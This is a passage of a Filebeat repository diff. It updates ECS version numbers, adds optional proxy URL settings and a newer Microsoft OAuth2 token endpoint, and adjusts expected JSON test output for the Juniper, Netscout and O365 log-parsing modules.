"event.dataset": "juniper.junos", @@ -2241,7 +2088,6 @@ "rsa.misc.obj_type": "reprehen", "rsa.misc.pid": "1578", "rsa.time.day": "19", - "rsa.time.event_time": "2020-01-19T15:25:23.000Z", "rsa.time.month": "Jan", "service.type": "juniper", "source.address": "oreve2538.www.localdomain", @@ -2254,7 +2100,6 @@ ] }, { - "@timestamp": "2020-02-02T22:27:57.000Z", "event.action": "rinre", "event.code": "UI_SCHEMA_SEQUENCE_ERROR", "event.dataset": "juniper.junos", @@ -2272,7 +2117,6 @@ "rsa.internal.messageid": "UI_SCHEMA_SEQUENCE_ERROR", "rsa.misc.event_type": "rinre", "rsa.time.day": "2", - "rsa.time.event_time": "2020-02-02T22:27:57.000Z", "rsa.time.month": "Feb", "service.type": "juniper", "tags": [ @@ -2281,7 +2125,6 @@ ] }, { - "@timestamp": "2020-02-17T05:30:32.000Z", "event.action": "deny", "event.code": "LIBJNX_EXEC_PIPE", "event.dataset": "juniper.junos", @@ -2303,7 +2146,6 @@ "rsa.misc.event_type": "olors", "rsa.misc.result": "unknown", "rsa.time.day": "17", - "rsa.time.event_time": "2020-02-17T05:30:32.000Z", "rsa.time.month": "Feb", "service.type": "juniper", "tags": [ @@ -2312,7 +2154,6 @@ ] }, { - "@timestamp": "2020-03-03T12:33:06.000Z", "event.action": "isnost", "event.code": "UI_DBASE_MISMATCH_EXTENT", "event.dataset": "juniper.junos", @@ -2333,7 +2174,6 @@ "rsa.misc.client": "lumdolor", "rsa.misc.event_type": "isnost", "rsa.time.day": "3", - "rsa.time.event_time": "2020-03-03T12:33:06.000Z", "rsa.time.month": "Mar", "service.type": "juniper", "tags": [ @@ -2342,7 +2182,6 @@ ] }, { - "@timestamp": "2020-03-17T19:35:40.000Z", "event.action": "eumfu", "event.code": "NASD_usage", "event.dataset": "juniper.junos", @@ -2362,7 +2201,6 @@ "rsa.misc.event_type": "eumfu", "rsa.misc.result": "unknown", "rsa.time.day": "17", - "rsa.time.event_time": "2020-03-17T19:35:40.000Z", "rsa.time.month": "Mar", "service.type": "juniper", "tags": [ @@ -2371,7 +2209,6 @@ ] }, { - "@timestamp": "2020-04-01T02:38:14.000Z", "event.action": "VPN", "event.code": "kmd", "event.dataset": "juniper.junos", @@ -2386,7 +2223,6 @@ "rsa.internal.messageid": "kmd", "rsa.misc.event_type": "VPN", "rsa.time.day": "1", - "rsa.time.event_time": "2020-04-01T02:38:14.000Z", "rsa.time.month": "Apr", "service.type": "juniper", "tags": [ @@ -2395,7 +2231,6 @@ ] }, { - "@timestamp": "2020-04-15T09:40:49.000Z", "event.code": "sshd", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -2413,7 +2248,6 @@ "rsa.misc.result": "unknown", "rsa.misc.severity": "very-high", "rsa.time.day": "15", - "rsa.time.event_time": "2020-04-15T09:40:49.000Z", "rsa.time.month": "Apr", "service.type": "juniper", "tags": [ @@ -2422,7 +2256,6 @@ ] }, { - "@timestamp": "2020-04-29T16:43:23.000Z", "event.code": "[4279]", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -2435,7 +2268,6 @@ "observer.vendor": "Juniper", "rsa.internal.messageid": "[4279]", "rsa.time.day": "29", - "rsa.time.event_time": "2020-04-29T16:43:23.000Z", "rsa.time.month": "Apr", "service.type": "juniper", "tags": [ @@ -2444,7 +2276,6 @@ ] }, { - "@timestamp": "2020-05-13T23:45:57.000Z", "event.action": "SNMPD_TRAP_QUEUE_DRAINED", "event.code": "SNMPD_TRAP_QUEUE_DRAINED", "event.dataset": "juniper.junos", @@ -2464,7 +2295,6 @@ "rsa.misc.event_type": "SNMPD_TRAP_QUEUE_DRAINED", "rsa.misc.obj_name": "vel", "rsa.time.day": "13", - "rsa.time.event_time": "2020-05-13T23:45:57.000Z", "rsa.time.month": "May", "service.type": "juniper", "tags": [ @@ -2473,7 +2303,6 @@ ] }, { - "@timestamp": "2020-05-28T06:48:31.000Z", "event.code": "[4837]", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -2486,7 +2315,6 @@ "observer.vendor": "Juniper", "rsa.internal.messageid": "[4837]", "rsa.time.day": "28", - "rsa.time.event_time": "2020-05-28T06:48:31.000Z", "rsa.time.month": "May", "service.type": "juniper", "tags": [ @@ -2495,7 +2323,6 @@ ] }, { - "@timestamp": "2020-06-11T13:51:06.000Z", "event.action": "piciatis", "event.code": "TFTPD_RECVCOMPLETE_INFO", "event.dataset": "juniper.junos", @@ -2516,7 +2343,6 @@ "rsa.internal.messageid": "TFTPD_RECVCOMPLETE_INFO", "rsa.misc.event_type": "piciatis", "rsa.time.day": "11", - "rsa.time.event_time": "2020-06-11T13:51:06.000Z", "rsa.time.month": "Jun", "service.type": "juniper", "tags": [ @@ -2525,7 +2351,6 @@ ] }, { - "@timestamp": "2020-06-25T20:53:40.000Z", "event.code": "usp_trace_ipc_reconnect", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -2541,7 +2366,6 @@ "rsa.internal.messageid": "usp_trace_ipc_reconnect", "rsa.misc.node": "usp_trace_ipc_reconnect", "rsa.time.day": "25", - "rsa.time.event_time": "2020-06-25T20:53:40.000Z", "rsa.time.month": "Jun", "service.type": "juniper", "tags": [ @@ -2550,7 +2374,6 @@ ] }, { - "@timestamp": "2020-07-10T03:56:14.000Z", "event.code": "BCHIP", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -2566,7 +2389,6 @@ "rsa.internal.messageid": "BCHIP", "rsa.misc.device_name": "IFP trace> BCHIP:", "rsa.time.day": "10", - "rsa.time.event_time": "2020-07-10T03:56:14.000Z", "rsa.time.month": "Jul", "service.type": "juniper", "tags": [ @@ -2575,7 +2397,6 @@ ] }, { - "@timestamp": "2020-07-24T10:58:48.000Z", "event.action": "moditemp", "event.code": "RPD_MPLS_LSP_DOWN", "event.dataset": "juniper.junos", @@ -2596,7 +2417,6 @@ "rsa.misc.result": "unknown", "rsa.network.interface": "eth2042", "rsa.time.day": "24", - "rsa.time.event_time": "2020-07-24T10:58:48.000Z", "rsa.time.month": "Jul", "service.type": "juniper", "tags": [ @@ -2605,7 +2425,6 @@ ] }, { - "@timestamp": "2020-08-07T18:01:23.000Z", "event.action": "uatDuisa", "event.code": "CHASSISD_PARSE_INIT", "event.dataset": "juniper.junos", @@ -2624,7 +2443,6 @@ "rsa.internal.messageid": "CHASSISD_PARSE_INIT", "rsa.misc.event_type": "uatDuisa", "rsa.time.day": "7", - "rsa.time.event_time": "2020-08-07T18:01:23.000Z", "rsa.time.month": "Aug", "service.type": "juniper", "tags": [ @@ -2633,7 +2451,6 @@ ] }, { - "@timestamp": "2020-08-22T01:03:57.000Z", "event.action": "upidatat", "event.code": "RMOPD_ROUTING_INSTANCE_NO_INFO", "event.dataset": "juniper.junos", @@ -2653,7 +2470,6 @@ "rsa.misc.event_type": "upidatat", "rsa.misc.result": "failure", "rsa.time.day": "21", - "rsa.time.event_time": "2020-08-22T01:03:57.000Z", "rsa.time.month": "Aug", "service.type": "juniper", "tags": [ @@ -2662,7 +2478,6 @@ ] }, { - "@timestamp": "2020-09-05T08:06:31.000Z", "event.action": "CHASSISD_TERM_SIGNAL:", "event.code": "CHASSISD_TERM_SIGNAL", "event.dataset": "juniper.junos", @@ -2682,7 +2497,6 @@ "rsa.misc.pid": "4305", "rsa.misc.result": "success", "rsa.time.day": "5", - "rsa.time.event_time": "2020-09-05T08:06:31.000Z", "rsa.time.month": "Sep", "service.type": "juniper", "tags": [ @@ -2691,7 +2505,6 @@ ] }, { - "@timestamp": "2020-09-19T15:09:05.000Z", "destination.ip": [ "10.49.190.163" ], @@ -2720,7 +2533,6 @@ "rsa.misc.result": "failure", "rsa.network.interface": "lo50", "rsa.time.day": "19", - "rsa.time.event_time": "2020-09-19T15:09:05.000Z", "rsa.time.month": "Sep", "service.type": "juniper", "tags": [ @@ -2729,7 +2541,6 @@ ] }, { - "@timestamp": "2020-10-03T22:11:40.000Z", "event.code": "[6968]", "event.dataset": "juniper.junos", "event.module": "juniper", @@ -2742,7 +2553,6 @@ "observer.vendor": "Juniper", "rsa.internal.messageid": "[6968]", "rsa.time.day": "3", - "rsa.time.event_time": "2020-10-03T22:11:40.000Z", "rsa.time.month": "Oct", "service.type": "juniper", "tags": [ @@ -2751,7 +2561,6 @@ ] }, { - "@timestamp": "2020-10-18T05:14:14.000Z", "destination.ip": [ "10.101.99.109" ], @@ -2778,7 +2587,6 @@ "rsa.misc.result": "success", "rsa.network.interface": "eth4282", "rsa.time.day": "18", - "rsa.time.event_time": "2020-10-18T05:14:14.000Z", "rsa.time.month": "Oct", "service.type": "juniper", "tags": [ @@ -2787,7 +2595,6 @@ ] }, { - "@timestamp": "2020-11-01T12:16:48.000Z", "event.action": "con", "event.code": "RPD_RDISC_NOMULTI", "event.dataset": "juniper.junos", @@ -2809,7 +2616,6 @@ "rsa.misc.result": "unknown", "rsa.network.interface": "lo7449", "rsa.time.day": "1", - "rsa.time.event_time": "2020-11-01T12:16:48.000Z", "rsa.time.month": "Nov", "service.type": "juniper", "tags": [ @@ -2818,7 +2624,6 @@ ] }, { - "@timestamp": "2020-11-15T19:19:22.000Z", "event.action": "isquames", "event.code": "BOOTPD_NEW_CONF", "event.dataset": "juniper.junos", @@ -2836,7 +2641,6 @@ "rsa.internal.messageid": "BOOTPD_NEW_CONF", "rsa.misc.event_type": "isquames", "rsa.time.day": "15", - "rsa.time.event_time": "2020-11-15T19:19:22.000Z", "rsa.time.month": "Nov", "service.type": "juniper", "tags": [ @@ -2845,7 +2649,6 @@ ] }, { - "@timestamp": "2020-11-30T02:21:57.000Z", "event.action": "ngelit", "event.code": "SNMP_TRAP_LINK_DOWN", "event.dataset": "juniper.junos", @@ -2868,7 +2671,6 @@ "rsa.misc.result_code": "ons", "rsa.network.interface": "lo3193", "rsa.time.day": "30", - "rsa.time.event_time": "2020-11-30T02:21:57.000Z", "rsa.time.month": "Nov", "service.type": "juniper", "tags": [ @@ -2877,7 +2679,6 @@ ] }, { - "@timestamp": "2020-12-14T09:24:31.000Z", "event.action": "udexerci", "event.code": "MIB2D_ATM_ERROR", "event.dataset": "juniper.junos", @@ -2896,7 +2697,6 @@ "rsa.misc.event_type": "udexerci", "rsa.misc.result": "failure", "rsa.time.day": "14", - "rsa.time.event_time": "2020-12-14T09:24:31.000Z", "rsa.time.month": "Dec", "service.name": "voluptat", "service.type": "juniper", diff --git a/x-pack/filebeat/module/juniper/netscreen/config/input.yml b/x-pack/filebeat/module/juniper/netscreen/config/input.yml index 8316e26b292..67a98eb5b2f 100644 --- a/x-pack/filebeat/module/juniper/netscreen/config/input.yml +++ b/x-pack/filebeat/module/juniper/netscreen/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/juniper/netscreen/test/generated.log-expected.json b/x-pack/filebeat/module/juniper/netscreen/test/generated.log-expected.json index 69e0e3b6122..ce020c94c5f 100644 --- a/x-pack/filebeat/module/juniper/netscreen/test/generated.log-expected.json +++ b/x-pack/filebeat/module/juniper/netscreen/test/generated.log-expected.json @@ -1353,8 +1353,8 @@ "observer.type": "Firewall", "observer.vendor": "Juniper", "related.ip": [ - "10.154.16.147", - "10.142.21.251" + "10.142.21.251", + "10.154.16.147" ], "rsa.internal.messageid": "00625", "rsa.misc.hardware_id": "ute", diff --git a/x-pack/filebeat/module/juniper/srx/config/srx.yml b/x-pack/filebeat/module/juniper/srx/config/srx.yml index 021eca1c964..0e7488d3da8 100644 --- a/x-pack/filebeat/module/juniper/srx/config/srx.yml +++ b/x-pack/filebeat/module/juniper/srx/config/srx.yml @@ -28,4 +28,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/microsoft/_meta/config.yml b/x-pack/filebeat/module/microsoft/_meta/config.yml index ee06eea9228..a168b621ba5 100644 --- a/x-pack/filebeat/module/microsoft/_meta/config.yml +++ b/x-pack/filebeat/module/microsoft/_meta/config.yml @@ -25,7 +25,11 @@ #var.oauth2.client.secret: "" # Oauth Token URL, should include the tenant ID - #var.oauth2.token_url: "https://login.microsoftonline.com/TENANT-ID/oauth2/token" + #var.oauth2.token_url: "https://login.microsoftonline.com/TENANT-ID/oauth2/v2.0/token" + + # Related scopes, default should be included + #var.oauth2.scopes: + # - "https://api.security.microsoft.com/.default" dhcp: enabled: true diff --git a/x-pack/filebeat/module/microsoft/_meta/docs.asciidoc b/x-pack/filebeat/module/microsoft/_meta/docs.asciidoc index 947cf39f1bb..dba51821e53 100644 --- a/x-pack/filebeat/module/microsoft/_meta/docs.asciidoc +++ b/x-pack/filebeat/module/microsoft/_meta/docs.asciidoc @@ -49,7 +49,9 @@ Example config: enabled: true var.oauth2.client.id: "123abc-879546asd-349587-ad64508" var.oauth2.client.secret: "980453~-Sg99gedf" - var.oauth2.token_url: "https://login.microsoftonline.com/INSERT-TENANT-ID/oauth2/token" + var.oauth2.token_url: "https://login.microsoftonline.com/INSERT-TENANT-ID/oauth2/v2.0/token" + var.oauth2.scopes: + - "https://api.security.microsoft.com/.default" ---- *`var.oauth2.client.id`*:: @@ -64,6 +66,10 @@ The secret related to the client ID. A predefined URL towards the Oauth2 service for Microsoft. The URL should always be the same with the exception of the Tenant ID that needs to be added to the full URL. +*`var.oauth2.scopes`*:: + +A list of included scopes, should use .default unless different is specified. + [float] ==== 365 Defender ECS fields diff --git a/x-pack/filebeat/module/microsoft/defender_atp/config/atp.yml b/x-pack/filebeat/module/microsoft/defender_atp/config/atp.yml index d1e5c971b80..a5a425cb57d 100644 --- a/x-pack/filebeat/module/microsoft/defender_atp/config/atp.yml +++ b/x-pack/filebeat/module/microsoft/defender_atp/config/atp.yml @@ -9,6 +9,10 @@ auth.oauth2: {{ .oauth2 | tojson }} auth.oauth2.provider: azure auth.oauth2.azure.resource: https://api.securitycenter.windows.com/ +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} + request.url: "https://api.securitycenter.windows.com/api/alerts" request.method: GET request.transforms: @@ -54,4 +58,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/microsoft/defender_atp/manifest.yml b/x-pack/filebeat/module/microsoft/defender_atp/manifest.yml index 1c93e4d277a..2bf5bf65034 100644 --- a/x-pack/filebeat/module/microsoft/defender_atp/manifest.yml +++ b/x-pack/filebeat/module/microsoft/defender_atp/manifest.yml @@ -8,6 +8,7 @@ var: - name: tags default: [defender-atp, forwarded] - name: oauth2 + - name: proxy_url ingest_pipeline: ingest/pipeline.yml input: config/atp.yml diff --git a/x-pack/filebeat/module/microsoft/dhcp/config/input.yml b/x-pack/filebeat/module/microsoft/dhcp/config/input.yml index 0e77cbdf491..d7ce60cf2af 100644 --- a/x-pack/filebeat/module/microsoft/dhcp/config/input.yml +++ b/x-pack/filebeat/module/microsoft/dhcp/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/microsoft/m365_defender/config/defender.yml b/x-pack/filebeat/module/microsoft/m365_defender/config/defender.yml index 52ebe56c3b1..4f92d93af7b 100644 --- a/x-pack/filebeat/module/microsoft/m365_defender/config/defender.yml +++ b/x-pack/filebeat/module/microsoft/m365_defender/config/defender.yml @@ -6,8 +6,10 @@ config_version: "2" interval: {{ .interval }} auth.oauth2: {{ .oauth2 | tojson }} -auth.oauth2.provider: azure -auth.oauth2.azure.resource: https://api.securitycenter.windows.com/ + +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.url: "https://api.security.microsoft.com/api/incidents" request.method: GET @@ -54,4 +56,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/microsoft/m365_defender/manifest.yml b/x-pack/filebeat/module/microsoft/m365_defender/manifest.yml index 99f00620d9d..e3524259d08 100644 --- a/x-pack/filebeat/module/microsoft/m365_defender/manifest.yml +++ b/x-pack/filebeat/module/microsoft/m365_defender/manifest.yml @@ -8,6 +8,7 @@ var: - name: tags default: [m365-defender, forwarded] - name: oauth2 + - name: proxy_url ingest_pipeline: ingest/pipeline.yml input: config/defender.yml diff --git a/x-pack/filebeat/module/misp/threat/config/input.yml b/x-pack/filebeat/module/misp/threat/config/input.yml index 488f0a249c0..d3b4d4b6f71 100644 --- a/x-pack/filebeat/module/misp/threat/config/input.yml +++ b/x-pack/filebeat/module/misp/threat/config/input.yml @@ -6,6 +6,9 @@ interval: {{ .interval }} request.method: POST request.ssl: {{ .ssl | tojson }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.url: {{ .url }} request.timeout: {{ .http_client_timeout }} request.body: {{ .http_request_body | tojson }} @@ -56,4 +59,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/misp/threat/manifest.yml b/x-pack/filebeat/module/misp/threat/manifest.yml index 63e3ef6db6e..312c800901f 100644 --- a/x-pack/filebeat/module/misp/threat/manifest.yml +++ b/x-pack/filebeat/module/misp/threat/manifest.yml @@ -13,6 +13,7 @@ var: default: "60s" - name: url - name: ssl + - name: proxy_url input: config/input.yml ingest_pipeline: ingest/pipeline.json diff --git a/x-pack/filebeat/module/mssql/log/config/config.yml b/x-pack/filebeat/module/mssql/log/config/config.yml index d908ffc950b..1ebfa1a280b 100644 --- a/x-pack/filebeat/module/mssql/log/config/config.yml +++ b/x-pack/filebeat/module/mssql/log/config/config.yml @@ -14,4 +14,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/mysqlenterprise/audit/config/config.yml b/x-pack/filebeat/module/mysqlenterprise/audit/config/config.yml index c62863d5ac8..2cf32816565 100644 --- a/x-pack/filebeat/module/mysqlenterprise/audit/config/config.yml +++ b/x-pack/filebeat/module/mysqlenterprise/audit/config/config.yml @@ -13,4 +13,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/netflow/log/config/netflow.yml b/x-pack/filebeat/module/netflow/log/config/netflow.yml index 460b45ee5c9..15e9ea0706e 100644 --- a/x-pack/filebeat/module/netflow/log/config/netflow.yml +++ b/x-pack/filebeat/module/netflow/log/config/netflow.yml @@ -36,4 +36,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/netscout/sightline/config/input.yml b/x-pack/filebeat/module/netscout/sightline/config/input.yml index 8174816245b..735ab1cc910 100644 --- a/x-pack/filebeat/module/netscout/sightline/config/input.yml +++ b/x-pack/filebeat/module/netscout/sightline/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/netscout/sightline/test/generated.log-expected.json b/x-pack/filebeat/module/netscout/sightline/test/generated.log-expected.json index 82bf1130e12..f1cbe891897 100644 --- a/x-pack/filebeat/module/netscout/sightline/test/generated.log-expected.json +++ b/x-pack/filebeat/module/netscout/sightline/test/generated.log-expected.json @@ -444,8 +444,8 @@ "observer.type": "DDOS", "observer.vendor": "Netscout", "related.ip": [ - "10.38.77.13", - "10.179.26.34" + "10.179.26.34", + "10.38.77.13" ], "rsa.internal.messageid": "Blocked_Host", "rsa.misc.msgIdPart1": "Blocked", @@ -1147,8 +1147,8 @@ "observer.type": "DDOS", "observer.vendor": "Netscout", "related.ip": [ - "10.163.161.165", - "10.83.23.104" + "10.83.23.104", + "10.163.161.165" ], "rsa.internal.messageid": "Blocked_Host", "rsa.misc.msgIdPart1": "Blocked", @@ -1888,8 +1888,8 @@ "observer.type": "DDOS", "observer.vendor": "Netscout", "related.ip": [ - "10.44.47.27", - "10.179.210.218" + "10.179.210.218", + "10.44.47.27" ], "rsa.internal.messageid": "Blocked_Host", "rsa.misc.msgIdPart1": "Blocked", @@ -2300,8 +2300,8 @@ "observer.type": "DDOS", "observer.vendor": "Netscout", "related.ip": [ - "10.166.90.130", - "10.73.89.189" + "10.73.89.189", + "10.166.90.130" ], "rsa.internal.messageid": "Blocked_Host", "rsa.misc.msgIdPart1": "Blocked", diff --git a/x-pack/filebeat/module/o365/audit/config/input.yml b/x-pack/filebeat/module/o365/audit/config/input.yml index 11c7be4fc70..a0df5d4578a 100644 --- a/x-pack/filebeat/module/o365/audit/config/input.yml +++ b/x-pack/filebeat/module/o365/audit/config/input.yml @@ -67,4 +67,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/o365/audit/test/04-sharepoint.log-expected.json b/x-pack/filebeat/module/o365/audit/test/04-sharepoint.log-expected.json index 04d66f454bc..5c77c57a26b 100644 --- a/x-pack/filebeat/module/o365/audit/test/04-sharepoint.log-expected.json +++ b/x-pack/filebeat/module/o365/audit/test/04-sharepoint.log-expected.json @@ -62,6 +62,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -132,6 +133,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -202,6 +204,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -272,6 +275,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", diff --git a/x-pack/filebeat/module/o365/audit/test/06-sharepointfileop.log-expected.json b/x-pack/filebeat/module/o365/audit/test/06-sharepointfileop.log-expected.json index 4a6f14974fc..dc9605ee5a7 100644 --- a/x-pack/filebeat/module/o365/audit/test/06-sharepointfileop.log-expected.json +++ b/x-pack/filebeat/module/o365/audit/test/06-sharepointfileop.log-expected.json @@ -70,6 +70,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -148,6 +149,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -226,6 +228,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -304,6 +307,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -383,6 +387,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -461,6 +466,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -539,6 +545,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -618,6 +625,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -696,6 +704,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -774,6 +783,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -852,6 +862,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", diff --git a/x-pack/filebeat/module/o365/audit/test/14-sp-sharing-op.log-expected.json b/x-pack/filebeat/module/o365/audit/test/14-sp-sharing-op.log-expected.json index 504cc25e971..7aa2f353396 100644 --- a/x-pack/filebeat/module/o365/audit/test/14-sp-sharing-op.log-expected.json +++ b/x-pack/filebeat/module/o365/audit/test/14-sp-sharing-op.log-expected.json @@ -48,6 +48,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -100,6 +101,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -152,6 +154,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -204,6 +207,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -256,6 +260,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -324,6 +329,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0", "user_agent.os.full": "Mac OS X 10.14", @@ -400,6 +406,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0", "user_agent.os.full": "Mac OS X 10.14", @@ -477,6 +484,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0", "user_agent.os.full": "Mac OS X 10.14", @@ -554,6 +562,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0", "user_agent.os.full": "Mac OS X 10.14", @@ -631,6 +640,7 @@ "user.id": 